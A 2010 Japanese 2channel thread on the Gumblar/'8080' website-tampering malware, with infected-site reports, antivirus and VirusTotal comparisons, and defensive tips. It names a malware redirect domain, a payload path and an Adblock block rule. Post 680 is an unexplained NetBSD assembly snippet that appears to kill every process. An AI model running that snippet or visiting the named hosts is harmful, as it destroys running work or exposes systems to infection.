*** 危険なサイトのアドレスはそのまま貼らないで「.」を「●」に変えてください ***


危険かもしれないってアドレスも含むぞ

529:名無しさん@お腹いっぱい。
10/01/08 00:02:42
>>523
アバストタンにも怒られた

530:名無しさん@お腹いっぱい。
10/01/08 00:09:37
お前らよく平気で踏めるな。

531:名無しさん@お腹いっぱい。
10/01/08 00:11:38
だいたい仮想環境で踏んでるんだろ
アホもいるだろうけど

532:名無しさん@お腹いっぱい。
10/01/08 00:12:40
自信があるならドンドン踏むことをオススメする、それが漢だ

自己責任だけどね

533:名無しさん@お腹いっぱい。
10/01/08 00:13:08
一応view-source:使ったけどそれでも怒られた
オンラインソースチェッカーがなくなったのが辛い

534:名無しさん@お腹いっぱい。
10/01/08 00:21:05
>>530

バーチャルなら余裕だべ

535:名無しさん@お腹いっぱい。
10/01/08 00:29:20
そろそろニュースでも扱われるようになってきたし
これを機にネットは怖いという意識が強くなって90年代半ばくらいのネット人口に戻ったりしないものか

536:名無しさん@お腹いっぱい。
10/01/08 00:37:40
しかし.ruばっかだな


537:名無しさん@お腹いっぱい。
10/01/08 00:38:46
別に感染してもたいしたことないしな
それほど怖くもないだろ

538:名無しさん@お腹いっぱい。
10/01/08 00:39:27
cnとruを遮断すればかなり安全になるしな

539:名無しさん@お腹いっぱい。
10/01/08 00:41:33
ならないだろうな、無関心な奴は大して気にしなさそうだしニュースで扱われても
一部の人間が騒ぐことになるだけ

mixiとかが感染媒体になれば大騒ぎになるだろうけど携帯メインの層は気にもとめないだろう

540:名無しさん@お腹いっぱい。
10/01/08 00:46:31
サイバーエージェントとノートンの「ノートン警察」閲覧者にトロイの木馬感染のおそれ
スレリンク(news板)  

541:名無しさん@お腹いっぱい。
10/01/08 01:08:28
>>523
/*LGPL*/
ちょっと変わってるぞ

>>529
あれ? こっちでは反応ない

542:名無しさん@お腹いっぱい。
10/01/08 01:12:26
>>541
スクリプトにはどこも反応しないみたいだね
URLリンク(www.virustotal.com)

543:541
10/01/08 01:22:17
もう一ヶ所/*LGPL*/になっている所をみつけた
新型スクリプトみたいだな
検出できるのはノートンの侵入検知くらいかも
avast!にはスクリプトの検体を提出しておこう

544:名無しさん@お腹いっぱい。
10/01/08 01:29:57
>>541
えっ
さっきトロイがどうとかいいながら発狂して何かを遮断したんだが

545:名無しさん@お腹いっぱい。
10/01/08 01:38:45
>>544
標準シールドとWebシールド(高)で使っているんだが
時間差で書き換えられたか?
定義データも手動で更新して100107-0の最新のはず
スクリプトは提出しておいた

546:名無しさん@お腹いっぱい。
10/01/08 01:58:14
貼られた直後に飛び先のチェックでソース見たときは/*GNU GPL*/だったような・・・
まったく確証のない俺の記憶だが、もしかしたら推測通りこの数分・数時間の間に書き換えられたのかも

547:名無しさん@お腹いっぱい。
10/01/08 02:43:36
Amebaのブログパーツ「ノートン警察」閲覧者にトロイの木馬感染のおそれ
URLリンク(www.itmedia.co.jp)

12月26日午後11時15分、委託先の制作会社が運営管理するブログパーツのサーバが不正アクセスを受け、
プログラムを改ざんされたという。ユーザーからの情報と委託先からの報告で改ざんが発覚。1月6日に
ブログパーツをすべて削除した。

 ノートン警察は、シマンテックと共同で昨年9月17日~12月9日に行った広告キャンペーン。
中川翔子さんの大切なもの「ギザ」をサイバー犯罪グループから守るというストーリー形式で、
ウイルスやトロイの木馬などについても学ぶ内容だったという。

548:名無しさん@お腹いっぱい。
10/01/08 02:47:15 BE:1887326-2BP(1236)
>>523
whois見てそこへ報告すた。
届けばいいけど。。。

549:名無しさん@お腹いっぱい。
10/01/08 02:54:13
Adblockのブロックリストに
|URLリンク(*.ru:8080)
で今のところは大丈夫かな

550:名無しさん@お腹いっぱい。
10/01/08 02:56:26
>>526
aguseで調べたけど出なかったKasperskyなのに
画像取得日時 2010-01-08 02:53:28
検出されたウイルス(ワーム、スパイウエア)
ウイルス(ワーム、スパイウエア)は検出されませんでした。


551:名無しさん@お腹いっぱい。
10/01/08 02:59:42
ドクター中松のサイトもやられてる

552:名無しさん@お腹いっぱい。
10/01/08 03:01:59 BE:2829492-2BP(1236)
>>551
/*GNU GPL*/ だぎゃ。。。

553:名無しさん@お腹いっぱい。
10/01/08 03:02:03
>>551
GNU GPLだね

554:名無しさん@お腹いっぱい。
10/01/08 03:08:37
しかし凄いことになってるな

555:名無しさん@お腹いっぱい。
10/01/08 03:09:16 BE:11319089-2BP(1236)
>>551
ほい、飛び先.ru:8080/pics/win.jpg
URLリンク(online.us.drweb.com)

556:名無しさん@お腹いっぱい。
10/01/08 03:33:03
インターネットからftpでメンテできるwebサイトが多すぎなのが悪いんだろ?
うちは、インターネット側からは、VPN経由でしかログインできないようにしてるから、
HP制作会社にはVPNクライアントいれてもらってる
仮にFTPアカウントが漏れてもVPNの認証を突破しない限り書き換え不可

557:名無しさん@お腹いっぱい。
10/01/08 03:34:32
avast!のWebシールドでも反応しない新ガンブラーが登場
スレリンク(news板)

558:名無しさん@お腹いっぱい。
10/01/08 03:38:13
今まで/*GNU GPL*/だったサイトも/*LGPL*/に変わったりするのかな?

Webシールドに頼って定義ファイルが手薄だったavastには不吉な予感

559:名無しさん@お腹いっぱい。
10/01/08 04:00:05
RequestPolicyでブロックしたがthelaceweb●ruだな。

560:名無しさん@お腹いっぱい。
10/01/08 04:14:39
>>523
スクリプト以外は今までと同じっぽいから
スクリプトだけで対応してたアンチウイルスは以外は大丈夫みたいだね

561:名無しさん@お腹いっぱい。
10/01/08 04:21:50 BE:1572252-2BP(1236)
>>541,543
漏れも別の感染のサイトで「/*GNU GPL*/ 」が「/*LGPL*/」に変わったのを確認したお。。。
他もそーなるんだろか…

562:名無しさん@お腹いっぱい。
10/01/08 04:22:12
ドクター中松のサイトが/*LGPL*/になった・・・

563:名無しさん@お腹いっぱい。
10/01/08 04:25:23 BE:943632-2BP(1236)
>>562
あちゃー

564:名無しさん@お腹いっぱい。
10/01/08 04:30:52 BE:2830436-2BP(1236)
しかも呼び込み先変えてるっぽい…

565:名無しさん@お腹いっぱい。
10/01/08 04:32:34
yahooやらgooやらがやられない事を祈るだけだな・・・

566:名無しさん@お腹いっぱい。
10/01/08 05:00:21
>>562
もともと/*LGPL*/じゃなかったの?
俺は初めに見た時から/*LGPL*/だったよ?
カスペは全く反応しなかったよ
新種なの?


567:名無しさん@お腹いっぱい。
10/01/08 05:05:39 BE:5660249-2BP(1236)
>>566
「/*GNU GPL*/」
URLリンク(megalodon.jp)
「/*LGPL*/」
URLリンク(megalodon.jp)

568:名無しさん@お腹いっぱい。
10/01/08 05:06:43
>>566
URLリンク(www.virustotal.com)
どこも検出しない

569:名無しさん@お腹いっぱい。
10/01/08 05:08:03
>>566
>>551-553
自分も確認したけどね
メモに控えてある感染サイトも時間ごとに/*LGPL*/に置き換わってる
あきらかに新型スクリプトだな
確認してないがウイルス本体も新型かもな

570:名無しさん@お腹いっぱい。
10/01/08 05:10:54 BE:2830829-2BP(1236)
>>569
一応>>567の下にはいつものはあったお
URLリンク(online.us.drweb.com)

571:名無しさん@お腹いっぱい。
10/01/08 05:12:44
検出逃れのために数時間の間に書き換えが行われているってこと?


572:名無しさん@お腹いっぱい。
10/01/08 05:13:32
>>571
えぐざくとりぃ
多分…

573:名無しさん@お腹いっぱい。
10/01/08 05:14:10
春先のGENO騒動(同人祭り)に比べてスレ伸びが鈍いのが気になる…大手企業も続々やられてるというのに。
adobe系更新でokだからか?
一般ユーザには実害が無いからか?
春先はちょうど時期的に豚インフルと重なって盛り上がっただけなのか?
この手の騒動に飽きたのか?

574:名無しさん@お腹いっぱい。
10/01/08 05:14:15
それじゃソフト入れて対策コピペの奴全部実行して対処しても意味ねーじゃん('A`)

575:名無しさん@お腹いっぱい。
10/01/08 05:17:09 BE:1572252-2BP(1236)
>>573
> 同人祭り
学習したんじゃないかな。。。

>>574
頻繁に更新があるウイルスもあったのでにゃー

576:名無しさん@お腹いっぱい。
10/01/08 05:18:01
>>573
GENOは起動不可だったり動作が重たかったりで気がつかれる失敗作だから
今回はちゃんと動くバージョンに進化したた言うべきなのか、いやな進化だ
ちょっと重いとかネットワークハブのランプが常にチカチカとか普通の人は気がつかないから怖い

577:名無しさん@お腹いっぱい。
10/01/08 05:22:20 BE:3773838-2BP(1236)
>>576
にゃるほど。
初期のものはそーだったのか。

578:名無しさん@お腹いっぱい。
10/01/08 05:22:53
>>573
・2ちゃんねるの規制・スレ分割・8080とGumblarと区別できなくて情報が錯綜・感染したか実感がない
などなど考えられることは多数。ってかスレの勢いが盛り上がりの指標とは限らない
正直、感染しましたってだけのレスだけで加速してるのならこれぐらいの勢いで、有用な情報のみ書き込まれる方が良い
>>574
発覚してない脆弱性を使ったゼロデイが使われない限り、今までの対策で問題なし

579:名無しさん@お腹いっぱい。
10/01/08 05:27:00
>>576
Gumblarとはまた別物なんだから進化したって訳じゃないだろ。今までのものより厄介な新種が出てきたって言った方が正しくね?
ちなみに初代Gumblarも復活の兆しありとか

580:名無しさん@お腹いっぱい。
10/01/08 05:27:27
>>573
前回時にAdobe系のアンスコやアップデートやAcrobat JS切る等の対策は周知されてたわけだから
今回騒いでるのって前回対策取らなかった人達だけだからじゃね

581:名無しさん@お腹いっぱい。
10/01/08 05:30:36
>>579
そうだな、8080系と言っておかないと混同してしまうな
ウイルス製作者同士のプライド合戦とか勘弁してほしいよ

582:名無しさん@お腹いっぱい。
10/01/08 05:30:40
>>578
水面下で拡大して後々めんどくさい事になるのが怖いんだが…。

583:名無しさん@お腹いっぱい。
10/01/08 05:33:32
結局、8080系に引っかかった奴らって>>580が答えなの?
あんだけ騒がれてたのにアップデートもしてなかったの?

584:名無しさん@お腹いっぱい。
10/01/08 05:34:11
同人系でも古参が多かったり旬で活発なジャンルは今でもGENOの注意書き残してるとこ多いからなぁ
若い子が多いジャンルや活動が活発じゃないジャンルは放置しっ放しだが

585:名無しさん@お腹いっぱい。
10/01/08 05:34:12
コメント行が書き換えられただけで検出できないって・・
どこのセキュソフトも本格的な対策は取ってないってこと?

586:名無しさん@お腹いっぱい。
10/01/08 05:40:13
>>581
まあGumblarと8080系の作った作者orグループが同一人物orグループでないとも言い切れないんじゃないのかな?w
そこら辺どうなってんのかはよく知らんけど、感染経路は似ていても別物であることは確か
>>585
何を以て本格的な対策と言うのか?そりゃスクリプトの時点で検知できなくても、その先で検知する場合もあるだろうし、しないかもしれない
ユーザーができる本格的な対策と言えば、脆弱性のあるソフトのアップデートとReaderのjs切るってこと
そしてウイルス対策ソフトで検知できるから安心だ!とか絶対に思わないこと

587:名無しさん@お腹いっぱい。
10/01/08 05:44:30
>>585
いや、Gumblar.xの時はもっとひどくて取得ごとにスクリプトが違ってたから
誤検出を考えると対応が難しいんだと思う
ほぼ確実な検出ができたのはカスペくらいだったはず

588:名無しさん@お腹いっぱい。
10/01/08 05:52:18
今のところついてってるのはNOD32だけだね
ユーザーの対策が出来ていても、htmlに埋め込まれたドロッパーは取り込んでしまうからね。
それに、この調子だとユーザー側の対策なんて、気休め程度になってしまうかもしれない。
JAVAもフラッシュも使えないネットなんて
経済的損失が計り知れなくなるだろう。

589:名無しさん@お腹いっぱい。
10/01/08 05:55:53
業者起きたのか。釣り針でけえな

590:名無しさん@お腹いっぱい。
10/01/08 05:57:19
NOD32(笑)

591:名無しさん@お腹いっぱい。
10/01/08 05:58:04
JAVAとJAVAScriptの区別は必要だな

592:名無しさん@お腹いっぱい。
10/01/08 05:58:51
おおっNOD32一番乗りか?と思いきや別のサイトのスクリプトでは・・・
偶然引っかかっただけだな

結果: 0/41
URLリンク(www.virustotal.com)
結果: 0/41
URLリンク(www.virustotal.com)
結果: 0/41
URLリンク(www.virustotal.com)

85 名前: 滑車(東日本)[sage] 投稿日:2010/01/08(金) 05:33:19.37 ID:ERkw5/xM
>>1のソースをvirustotalにおくったらNOD32だけが反応した
スレリンク(news板:85-87番)

593:名無しさん@お腹いっぱい。
10/01/08 05:59:26
>>589
>>588はこのことだね。
スレリンク(news板:85-87番)n

594:名無しさん@お腹いっぱい。
10/01/08 06:01:47
>>593 それ書いたのは僕なんですがAvast!信者です。


595:名無しさん@お腹いっぱい。
10/01/08 06:01:49
さて、変わったのはコメント行だけかな?
どうやって指令してるのかな?

596:名無しさん@お腹いっぱい。
10/01/08 06:04:58
犬HKラジオでもトップニュース扱いだな。

597:名無しさん@お腹いっぱい。
10/01/08 06:05:22
受付のスクリプトに反応するかしないかの問題であって、他のベンダーが絶対検知できないって訳じゃないでしょ
要はどの段階で検知するかの問題
後virustotalでの結果と実製品で違いでる場合がある。ヒューリスティックの違いなのか、HIPSとかとの兼ね合いなのか詳しい事は俺は知らん

でも1つだけ言えることは、このスレはどこのベンダーが良い・悪いとか議論するとこじゃないと思うけど?
製品比較やりたいなら、適当な別スレでどうぞ

598:592
10/01/08 06:12:34
自分はあくまで検証目的で貼っただけなんだが・・・
気を悪くしたなら少し控えるか
定義データに左右されないらしいノートンの侵入検知の例もあるしな

599:名無しさん@お腹いっぱい。
10/01/08 06:16:18
>>598
いやいや、検証目的としてはぜんぜんおkだし>>592のレス内容を叩いてる訳じゃない。これからもどうぞ続けて下さいw
俺が言いたかったのはただ単に特定のベンダーが良い・悪いとかここですんなよってだけです
紛らわしいタイミングになってサーセン

600:名無しさん@お腹いっぱい。
10/01/08 06:19:34
>>599
おk
ではこれからも節度を持った上で貼らせてもらおう

601:名無しさん@お腹いっぱい。
10/01/08 07:21:17
なんだかすげえ馬鹿スレになってきたな

602:名無しさん@お腹いっぱい。
10/01/08 07:43:56
>>522
ノートンは確信犯だってば
芸能アバターのせい

603:名無しさん@お腹いっぱい。
10/01/08 08:03:40
良い悪いすんなっても気になるのが人情だろ。
人間見ないでルールだけ見る奴って何なの?

604:名無しさん@お腹いっぱい。
10/01/08 08:09:03
avast以外大丈夫だよ

605:名無しさん@お腹いっぱい。
10/01/08 08:53:47
そもそも、インターネットからFTPで更新できるってのがもういまの時代はダメダメだろ
特定のIPアドレスに制限するとか、VPN必須にするとかしないと

606:名無しさん@お腹いっぱい。
10/01/08 09:25:29
>>604
なにが?avast!以外大丈夫なのかな?


607:名無しさん@お腹いっぱい。
10/01/08 09:37:40
これ明らかに世界中のインターネット絶滅推進派が仕組んだテロだろ

608:名無しさん@お腹いっぱい。
10/01/08 09:47:27
まずいなあ、ウイルス本体も新型みたいだぞ

結果: 0/40
URLリンク(www.virustotal.com)
avast!Anti-Virus Part120
スレリンク(sec板:448番)

609:名無しさん@お腹いっぱい。
10/01/08 09:48:34
こういうネズミ算式に増えていく無差別で大規模な改竄は今まで何度かあったけど、
今回はAdobeが脆弱性を12日(日本時間13日)まで放置してるのが痛すぎる。

610:名無しさん@お腹いっぱい。
10/01/08 10:27:03
>>609
年末年始休暇を狙った組織的犯行の模様
サイト運営者もアップデート担当の開発者も休みだろうしな

611:sage ◆sage/xLnlI
10/01/08 10:28:46
>>608
('A`)

612:名無しさん@お腹いっぱい。
10/01/08 11:13:29
結局どうすりゃいいのよ、誰もわかんないのかよ

613:名無しさん@お腹いっぱい。
10/01/08 11:16:20
lanケーブルをハサミでチョキンとやれば確実に防げるぞ

614:名無しさん@お腹いっぱい。
10/01/08 11:18:47
FTPの情報どうやって抜いてんの?
FFFTPのレジストリに生で記録されてんのか?
iniに出力するようにしてるんだが、どうだろうか

615:名無しさん@お腹いっぱい。
10/01/08 11:29:36
会社で借りてるサーバにうちの馬鹿が感染させたんだが、
上に言っても、パスワードは変えられないの一点張り、脳みそがイカれてる

書き換えられるたびにコード削除していくの疲れたよ

616:名無しさん@お腹いっぱい。
10/01/08 11:30:16
FTP通信したときのパケットそのものを見てると思う
FTPソフト側での回避は無理

617:名無しさん@お腹いっぱい。
10/01/08 11:33:20
>>615

感染したのは8080?
書き換えられる頻度はどのくらい?

618:名無しさん@お腹いっぱい。
10/01/08 11:38:49
>>615
それはありえんw

619:名無しさん@お腹いっぱい。
10/01/08 11:50:47
>>615

アホだなー

620:名無しさん@お腹いっぱい。
10/01/08 11:55:01
>>615
なんで変えられないんだろう?
感染をもみ消したいのかな?

更に大きな感染呼び込んで信用失うだけだと思うが。

621:sage ◆sage/xLnlI
10/01/08 12:09:16
URLリンク(www.zenoah.co)アッー!jp/

実験台で見たらコードがなかった・・・

622:名無しさん@お腹いっぱい。
10/01/08 12:09:31
>>617
まだ3回くらいだけどね
IDパスばれてるんだから今後もやられるとしたらキツいんだ

今は/*LGPL*/から始まって8!@0@^8)@0?/とか書いてあるから8080だろう
前は/*GNU GPL*/だったな

一部/*GNU GPL*/~のまま放っておいたものが/*LGPL*/~に置き換わってた
追記じゃないみたいだね

>>620
全ファイル消去されたら考えも変わるかもね
俺は元データ持ってないから落してエディタで書き換えて再アップ
スクリプト書いて消そうかと思ったけどミスって全消去したら・・・怖いな

623:名無しさん@お腹いっぱい。
10/01/08 12:11:02
>>622
なんなのその原始時代みたいな会社w

624:名無しさん@お腹いっぱい。
10/01/08 12:11:25 BE:235456823-2BP(7777)
他人の不幸で飯が旨い

625:名無しさん@お腹いっぱい。
10/01/08 12:15:13
どうせ感染したというアナウンスもしてないんだろ

てういか今後も感染するから出せないかw

626:名無しさん@お腹いっぱい。
10/01/08 12:15:39
>>623
実際、原始時代みたいな会社だよ
いくら言っても「スキャンしとけよ、ファイル書き換えておけ」と言われるだけ
セキュリティに何の関心もない様子
去年のGENOもしっかり掛かってたしな、そのときもパス変えてくれって言ったけど今に至る

627:名無しさん@お腹いっぱい。
10/01/08 12:18:01
>>626
そういうバカ会社は一回痛い目を見ないと変わらないから
全消去になったほうがいいかもね。

いくら言っても聞かなかったくせに、いざその事態になると泣きつくんだよな。
ほんと氏ねよと思うわw

628:名無しさん@お腹いっぱい。
10/01/08 12:19:59
>>626
会社としてやばい
すぐに転職を勧める

629:sage ◆sage/xLnlI
10/01/08 12:28:39
URLリンク(up3.viploader.net)

一部の記号を消したらこうなった

630:名無しさん@お腹いっぱい。
10/01/08 12:33:03
誰か検体上げてくれ

631:名無しさん@お腹いっぱい。
10/01/08 12:33:58
なんでサーバーの管理者がWindowsなんか使ってるんだ?
普通は違うOSを使うと思うんだけどな

632:名無しさん@お腹いっぱい。
10/01/08 12:34:52
>>631
Webデザイナのマシンに感染したとか

633:名無しさん@お腹いっぱい。
10/01/08 12:40:04
ずっと鯖OSさわってるのは鯖屋であって
鯖管とは違くないか

Telnetあるし

634:sage ◆sage/xLnlI
10/01/08 12:41:51
URLリンク(up3.viploader.net)

hundekuru

635:名無しさん@お腹いっぱい。
10/01/08 12:42:21
ソースチェッカーオンラインみたいなサイトないの?
怖くて未知のURLは踏めん・・・

636:名無しさん@お腹いっぱい。
10/01/08 12:43:32
Telnetってww
いつの時代だよwww

637:sage ◆sage/xLnlI
10/01/08 12:43:45
仮想でAVAST止めて行ったら仮想じゃない方攻撃されてノートン先生に止められたwwwwwww

638:名無しさん@お腹いっぱい。
10/01/08 12:44:46
顧客情報にアクセスできるショッピングサイトの管理者はすぐに対応しろ

639:名無しさん@お腹いっぱい。
10/01/08 12:45:22
>>625
URLリンク(www.aguse.jp)

640:名無しさん@お腹いっぱい。
10/01/08 12:48:33
>>637
そのゲストOS・・・プロダクトキー入れてる?
盗まれるぞ・・・

641:名無しさん@お腹いっぱい。
10/01/08 12:54:44
>>281
それってなんでWindows標準FWだと防げないの
既知のアプリの未知のポートだと無理だけど
未知のアプリが通信しようとすればポップアップがあるのは変わらないはずだけど

642:名無しさん@お腹いっぱい。
10/01/08 13:00:04
>>641
WindowsファイアウォールAPIってのがあってだな・・・
例外追加等々

643:名無しさん@お腹いっぱい。
10/01/08 13:12:35
>>642
MSDNに該当する記事有り
Windows Firewall and Windows Firewall with Advanced Security (Windows)
URLリンク(msdn.microsoft.com)(VS.85).aspx

644:sage ◆sage/xLnlI
10/01/08 13:31:12
>>640
このゲストOS・・・プロダクトキー入れてる
盗まアッれるの・・・


645:名無しさん@お腹いっぱい。
10/01/08 13:33:10
>>642
なにそれ
だめじゃん

646:名無しさん@お腹いっぱい。
10/01/08 13:34:22
そもそも、Windowsを管理者権限で常に使用してるようなやつが
Firewallとかセキュリティーとかの各種設定をトロイに変更されたりするんだろ

通常使用は一般ユーザーで使用すればいいのに
7/Vistaなら、ログインしなおさなくても管理者権限が必要なときは管理者パスワードのダイヤログボックスが開いて
すぐ管理者作業できるから、常に一般ユーザーでログイン知れればいい

647:名無しさん@お腹いっぱい。
10/01/08 13:36:03
>>644
マイクロソフトで使用期限3ヶ月くらいの体験版の仮想マシンVPC配ってるから、
その仮想マシン使えばいい

648:名無しさん@お腹いっぱい。
10/01/08 13:36:15
一般ユーザーですら管理者権限
流石Microsoft

649:sage ◆sage/xLnlI
10/01/08 13:37:32
>>647
大丈夫がと思うよ
なにかあったときにはAVASTとノートン先生が守ってくれるからb

650:sage ◆sage/xLnlI
10/01/08 13:38:12
>>648
なアッー!っなアッー!んだアッー!ってええええええええええええええええええええええええええええええええええええええええ

651:sage ◆sage/xLnlI
10/01/08 13:40:03
>>647
アッー!と、一回M$のXPModeで、ひどい目にアッー!っアッー!から使いたくない

652:名無しさん@お腹いっぱい。
10/01/08 13:41:18
◆sage/xLnlI、アウト~

653:名無しさん@お腹いっぱい。
10/01/08 13:41:18
>>646
明示的に表示されてないとfirewallスルーできないよね
できないといって><

654:sage ◆sage/xLnlI
10/01/08 13:42:12
>>652
なアッー!んで?

655:名無しさん@お腹いっぱい。
10/01/08 13:42:51
結論「ユーザーの意識改革が必要」

656:名無しさん@お腹いっぱい。
10/01/08 13:43:52
少々知識が足りなかったようだな

657:sage ◆sage/xLnlI
10/01/08 13:44:29
Firefoxがクラッシュしまアッー!した

658:名無しさん@お腹いっぱい。
10/01/08 13:44:59
NGNameに追加 sage </b>◆sage/xLnlI <b>

659:名無しさん@お腹いっぱい。
10/01/08 13:45:51
話は全部聞かせて貰ったぞ!(ガラッ
sage ◆sage/xLnlIのプロダクトキーは既に流出している

660:sage ◆sage/xLnlI
10/01/08 13:46:35
>>659
えっ


どうゆうこと?




661:名無しさん@お腹いっぱい。
10/01/08 13:59:27
既に感染しているかどうかを調べる方法がないことだけは分かった

662:sage ◆sage/xLnlI
10/01/08 14:00:29
>>661
うn


windows7の感染確認方法知ってす人いないよね?・?

663:名無しさん@お腹いっぱい。
10/01/08 14:02:03
>>646

そもそもXPの時点では、まともにユーザーモードで動かないソフトが多すぎて...



664:名無しさん@お腹いっぱい。
10/01/08 14:04:28
ずっとこんなイタチゴッコ続けるのかよ。
感染したらUbuntuにする。少なくとも嫁のPCは。

665:名無しさん@お腹いっぱい。
10/01/08 14:04:34
もそもそ

666:名無しさん@お腹いっぱい。
10/01/08 14:05:52
>>664
上流のdebianにしろksg

667:名無しさん@お腹いっぱい。
10/01/08 14:06:08
むしろ感染してしまえば楽になるような気がする
俺は遠慮するけど

668:名無しさん@お腹いっぱい。
10/01/08 14:10:35
とりあえず現状、普通のクライアントPCが感染してるかどうかの判断ってどうやってんの?
春のGENO祭りの時にはレジストリ内におかしなファイルが有るか無いかで判断してたが

669:名無しさん@お腹いっぱい。
10/01/08 14:12:00
ウイルスの検体マダー!?

670:名無しさん@お腹いっぱい。
10/01/08 14:12:47
>>663
自分もそれが困る
たいしたソフトじゃないのになんで管理者権限じゃなきゃいけないんだろう

671:sage ◆sage/xLnlI
10/01/08 14:12:54
>>669
>>76


672:名無しさん@お腹いっぱい。
10/01/08 14:14:31
プロダクトキーを入力せずにインスコ→被害者向けの特価で正規のプロダクトキー購入→ウマー
これがMicrosoftクオリティーなのか・・・

673:名無しさん@お腹いっぱい。
10/01/08 14:26:03
>>668
ウソの情報が飛び交ってるだけで、アンチウイルスソフト作ってる会社でも分からない

674:名無しさん@お腹いっぱい。
10/01/08 14:28:05
>>673
嘘の情報ってww
検体があればリバースエンジニアリングで動作くらい分かるだろJK

675:名無しさん@お腹いっぱい。
10/01/08 14:32:49
>>663
つ 別のユーザとして実行

これで動かないソフトのほとんどは動く。


676:名無しさん@お腹いっぱい。
10/01/08 14:32:53
あっちこっちで呼び方が違うからもう何がなんだか分からない

677:名無しさん@お腹いっぱい。
10/01/08 14:33:42
>>664
誰も使ってないようなOSにすればウイルスのターゲットにならないから、
できるだけマイナーなのにしとけ

NetBSDとかOpenBSDとか

678:名無しさん@お腹いっぱい。
10/01/08 14:33:58
普通のクライアントPCは感染してるかどうか確認する方法ないの?
マジで?

全台クリーンインストールしろと言うのか

679:名無しさん@お腹いっぱい。
10/01/08 14:36:02
>>678
新種のマルウェアに強いウイスルソフト使ってスキャンすればいいだろ
100%ではないが、だいたい確認できる

680:名無しさん@お腹いっぱい。
10/01/08 14:37:00
section .note.netbsd.ident
dd 0x07,0x04,0x01
db "NetBSD",0x00,0x00
dd 200000000


section .data

section .text
global _start

_start:
xor eax, eax
push 0x09
mov eax, -1
push eax
xor eax,eax
mov al, 37
push eax
int 0x80

681:名無しさん@お腹いっぱい。
10/01/08 14:38:21
>>648
マニュアル読め。
スタートアップガイドで普段は制限ユーザで使うようにと書いてあるわ。

682:名無しさん@お腹いっぱい。
10/01/08 14:39:01
AdobeReaderもFlashPlayerもJREも、
常に最新版に更新って言っても実際に更新かかるまでには微妙にタイムラグあるよな。
つまり、アップデートに気を使ってた場合でも、
最新版になる前にたまたま感染サイト踏んでたらアウトだよな。

683:名無しさん@お腹いっぱい。
10/01/08 14:39:28
>>681
誰でも簡単に権限昇格できるWindowsなんて(ry

684:名無しさん@お腹いっぱい。
10/01/08 14:43:17
>>675

大量にあったら、そんなめんどーなことは誰もやってくれないつぅこと
各アプリケーションもほとんどまともに対応してくれなかったしねぇ~

Vistaが出てやっと対応したところのが多いじゃん

685:名無しさん@お腹いっぱい。
10/01/08 14:46:15
【ネット】洋菓子「モロゾフ」のサイト、何者かが改ざん 閲覧すると新型ウイルス「ガンブラー」に感染する恐れがあったが、被害報告なし
1 :おっおにぎりがほしいんだなφ ★:2010/01/06(水) 07:20:34 ID:???0
洋菓子メーカー「モロゾフ」(本社・神戸市)のインターネットサイトが
何者かに改ざんされる被害に遭っていたことが5日、わかった。

同社によるとサイトを閲覧したパソコンが新型コンピューターウイルス
「ガンブラー」に感染する恐れがあったが、被害の報告はなく、
サイトは改善済みという。

同社の説明では、改ざんされたのは4日午後7時半~5日正午で、
感染や情報漏えいなどの連絡はない、としている。




こういう「被害の報告は無く」ってのが一番怖いと思うんだが…
閲覧ユーザは感染に気づかず、ボット化してる可能性もあるって事だろ?

686:名無しさん@お腹いっぱい。
10/01/08 14:48:00
>>682
だからそのときのために、わざわざMSがIEに保護モードつけたりしてくれてるんだろ
ちゃんと保護モードに対応したIEプラグイン類なら、プラグインに脆弱性があってマルウェアにやられても、
やられる範囲を制限できる

687:名無しさん@お腹いっぱい。
10/01/08 14:50:26
【今株馬鹿】GENOウイルスのお陰でウイルス対策会社の株が急騰
スレリンク(news板)

688:名無しさん@お腹いっぱい。
10/01/08 14:51:25
保護モードなんてバイパス出来るだろww

689:名無しさん@お腹いっぱい。
10/01/08 14:53:07
>>686
IEの保護モード機能ってサイト閲覧時のファイル保存先を限定してるだけじゃないの?
Adobeの脆弱性を突いた攻撃と何の関係があるの?

690:名無しさん@お腹いっぱい。
10/01/08 14:54:51
感染しているかどうかを調べる
今一番有力な方法を教えてくださひ。

691:名無しさん@お腹いっぱい。
10/01/08 14:56:19
>>685
お前らモロゾフのHP見てみろw
URLリンク(mimizun.com)

1 :以下、名無しにかわりましてVIPがお送りします:2010/01/04(月) 22:48:45.86 ID:kMgcW7bI0
URLリンク(www.morozoff.co.jp)

なんだこれw


5 :以下、名無しにかわりましてVIPがお送りします:2010/01/04(月) 22:53:02.74 ID:+8J8P32m0
Javaのコンソールが起動してPCがすげー重くなった
なんか仕込まれてるの?


7 :以下、名無しにかわりましてVIPがお送りします:2010/01/04(月) 23:00:03.62 ID:euSlf2pA0
>>1
死ね

重いいいいいいいいいい

692:名無しさん@お腹いっぱい。
10/01/08 14:56:45
webサイト作ったらわかるんじゃね?
改ざんされたら感染してる

693:名無しさん@お腹いっぱい。
10/01/08 14:59:14
VPCでモロゾフを踏んでみた。
processmoniterでその時の挙動を調べてみたが、何も起こらない・・・

694:名無しさん@お腹いっぱい。
10/01/08 15:01:03
保護モードって、IEのプロセスを通常よりさらに限定された権限で
動作させることに一番の意味があるんだよ

保護モード非対応のプラグイン類を動作させるときはデフォルトで警告が出るし、
警告がでない保護モード対応プラグインなら、脆弱性でやられてもまず影響が出ない

保護モード下で動いてるIEやプラグインに脆弱性があってやられても、
システムのほとんどの場所に書き込めない

このあたり呼んでみれば?
URLリンク(msdn.microsoft.com)(VS.85).aspx

695:名無しさん@お腹いっぱい。
10/01/08 15:03:37
>>692
適当なHTML作って、FTPでどこか上げたときに
書き換わってるかをチェックする感じでしょうか?
社員のPCをチェックしたいんですがなにかいい
方法はないかなァと思いまして。。。

696:名無しさん@お腹いっぱい。
10/01/08 15:03:51
保護モードバイパス美味しいです^^
CodeProject: A Developer's Survival Guide to IE Protected Mode. Free source code and programming help
URLリンク(www.codeproject.com)

697:名無しさん@お腹いっぱい。
10/01/08 15:16:11
>>693
そりゃあ、今踏んだって何も起こらなくて当然。

698:名無しさん@お腹いっぱい。
10/01/08 15:21:48
>>694を素直に読むと、IEの保護モード有効下だとAdobe脆弱性回避できるように思えるけど実際は違うよな?

699:名無しさん@お腹いっぱい。
10/01/08 15:22:40
他サイトに飛ぶときに警告を出せば済む話だろう
2ちゃんを見習え

700:名無しさん@お腹いっぱい。
10/01/08 15:28:22
>>694

>>99
99 :名無しさん@お腹いっぱい。:2009/12/28(月) 08:37:05
何か役に立つかもしれないので報告

fxwill●comにウイルスがあると聞き試しに見てみた(←阿呆)
/*GNU GPL*/~というコードが埋め込まれてたっぽい

サイトを開くと
